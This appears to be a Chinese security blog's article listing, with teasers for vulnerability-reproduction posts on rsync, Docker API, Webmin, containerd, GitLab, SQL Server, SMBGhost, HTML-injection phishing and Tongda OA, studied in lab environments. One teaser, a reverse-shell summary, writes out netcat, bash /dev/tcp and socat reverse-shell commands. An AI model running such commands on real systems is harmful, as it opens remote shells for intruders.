自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(14)
  • 收藏
  • 关注

原创 rsync未授权漏洞复现

漏洞简介:rsync是linux系统下的数据镜像备份工具,使用rsync可以快速增量备份数据,支持本地复制,或与其他ssh、rsync主机同步。该协议默认监听873端口,如果目标开启rsync,并且没有配置ACL或访问密码,就可以未授权读写目标服务器文件。环境搭建:本此环境使用docker-vulhub进入vulhub-rsync,运行docker-compose up -d环境搭建完成后,用nmap扫描一下,发现服务已经启动漏洞复现1.列出模块下的文件2.下载任意文件rsync r

2022-03-31 16:15:03 5820

原创 HTML注入实现钓鱼

HTML注入实现钓鱼HTML注入介绍:超文本标记语言(HTML)注入有时也被称为虚拟污染。 这实际上是一个由站点造成的攻击,该站点允许恶意用户向其 Web 页面注入 HTML,并且没有合理处理用户输入。 换句话说,HTML 注入漏洞是由接收 HTML 引起的,通过一些表单输入后会呈现在页面。由于 HTML 是用于定义网页结构的语言,如果攻击者可以注入 HTML,它们基本上可以改变浏览器呈现的内容。 有时,这可能会导致页面外观的完全改变,恶意用户会通过注入覆盖掉之前的界面,展现出精心构造的页面,引导用户

2021-08-15 11:10:33 1771

原创 vluhub之docker-unauthoriun-rce复现

1.漏洞简介:该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url实现docker命令。2.漏洞复现环境介绍:1.攻击机kali:192.168.231.1282.靶机ubuntu:192.168.231.185靶场搭建(1):ubuntu下载vluhubvulhub官网地址:https://vulhub.orggithub下载:https://github.com/vulhub/vulh

2021-08-07 11:56:12 1516

原创 Webmin(CVE-2021-31761)XSS-RCE

Webmin(CVE-2021-3161)漏洞复现漏洞简介:Webmin是基于Web的界面的用于类Unix的系统管理工具。该工具基于BS架构,可以让你很轻易的使用任何现代的Web浏览器,很轻易的管理您的服务器。近日,Webmin官方通告了三个CVE漏洞,包括CVE-2021-31760,CVE-2021-31761,CVE-2021-31762。远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。以下复现CVE-2021-31761,cve

2021-04-30 10:41:47 718

原创 Webmin(CVE-2021-31760)CSRF-RCE环境搭建-漏洞复现

Webmin(CVE-2021-31760)漏洞简介:Webmin是基于Web的界面的用于类Unix的系统管理工具。该工具基于BS架构,可以让你很轻易的使用任何现代的Web浏览器,很轻易的管理您的服务器。近日,Webmin官方通告了三个CVE漏洞,包括CVE-2021-31760,CVE-2021-31761,CVE-2021-31762。远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。以下复现第一个CVE-2021-31760影响范

2021-04-29 10:03:55 1591 2

原创 反弹shell命令总结

反弹shell命令总结1.nc反弹开启本地8080端口监听,并将本地的bash发布出去。root# nc -lvvp 8080 -t -e /bin/bash连接目标主机nc ip 端口2.bash直接反弹kali监听靶机运行:root# bash -i >& /dev/tcp/ip/端口 0>&1bash命令解析:反弹成功3. socat反弹kali监听:socat tcp-listen:1234 -靶机运行:socat exec:‘

2021-04-28 16:33:52 1276 1

原创 Docker容器逃逸漏洞复现(CVE-2020-15257)

Docker容器逃逸漏洞复现(CVE-2020-15257)漏洞简介containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。影响版本containerd &

2021-04-28 13:50:07 635

原创 Gitlab任意文件读取漏洞(cve-2020-10977)

Gitlab任意文件读取漏洞(cve-2020-10977)简介:GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。在Gitlab 8.5-12.9版本中,存在一处任意文件读取漏洞,攻击者可以利用该漏洞,在不需要特权的状态下,读取任意文件,造成严重信息泄露,从而导致进一步被攻击的风险。...

2021-04-27 09:56:23 2724 1

原创 SQL Server 远程代码执行漏洞复现(cve-2020-0618)

SQL Server 远程代码执行漏洞复现(cve-2020-0618)简介SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。漏洞概述低权限的攻击者向影响版本SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码,即可实现getshell。影响版本SQL Server 2012 for 32-bit Systems Service Pack 4

2021-04-26 14:11:10 2429

原创 horusec使用教程

horusec使用教程1.Horusec工具是干什么的?Horusec是一款功能强大的开源工具,它可以帮助广大研究人员执行静态代码分析,以识别开发过程中的安全缺陷。目前,Horusec支持分析的语言有:C#、Java、Kotlin、Python、Ruby、Golang、Terraform、Javascript、Typescript、Kubernetes、PHP、C、HTML、JSON、Dart2.工具安装安装方式有跟多,本文介绍简单实用的安装方式(采用docker安装)本地使用如需在本地使用Ho

2021-04-05 12:47:58 568

原创 AWVS登录扫描与不登陆扫描详解

AWVS登录扫描与不登陆扫描详解第一步:新建任务例如:第二步:点击保存,默认即可第三步:点击保存。创建任务成功。以下界面显示扫描进度、漏洞类型,以及漏洞个数。第四步:扫描完成。可以查看漏洞,点击相对应的漏洞即可查看。例如:查看高危漏洞,单击高危漏洞选项。依次是(高、中、低、参考)以上为不登录扫描过程导出报告第一步:选中扫描完成的任务,点击产生报告。第二步:选择报告类型-开发者(developer)第三步:点击选择报告类型:pdf或html。点击下载即可。举例:以下

2021-04-05 12:15:11 10606 7

原创 永恒之黑复现(CVE-2020-0796)

漏洞环境虚拟机搭建:迅雷下载ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/适用windows10版本:适用于32位系统的Windows 10版本1903Windows 10 1903版(用于基于x64的系统)Windows 10 1903版(用于基于ARM64的系统)Windows Server

2020-06-04 17:41:55 2003

原创 ctf-jarvisoj

题目连接:(http://web.jarvisoj.com:32794)拿到题目扫一下目录发现页面源代码源码分析1.`$table = $_GET['table']?$_GET['table']:"test";`该代码为三目运算符:条件?结果1,结果2。根据源码判断table=test2.mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();该代码为主要代码,分析发现由于table可控,想到在table后边拼接sql语句

2020-06-03 17:08:22 211

转载 通达oa漏洞复现

通达oa任意用户登录复现1.漏洞原理首先源码分析跟踪文件/general/login_code.php,php文件均经过了zend|54加密,使用在线网站解密即可在线zend解密源码分析:第12行随机生成了一串登录的CODEUID,并在第35行通过set_cache方法将该标识CODEUID插入到redis缓存中,且第37行将该CODEUID进行了输出。所以想到通过访问该页面可以获得codeuid。根进logincheck_code.php发现uid可控,post可以指定uid的值。cod

2020-05-25 17:18:29 1390

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除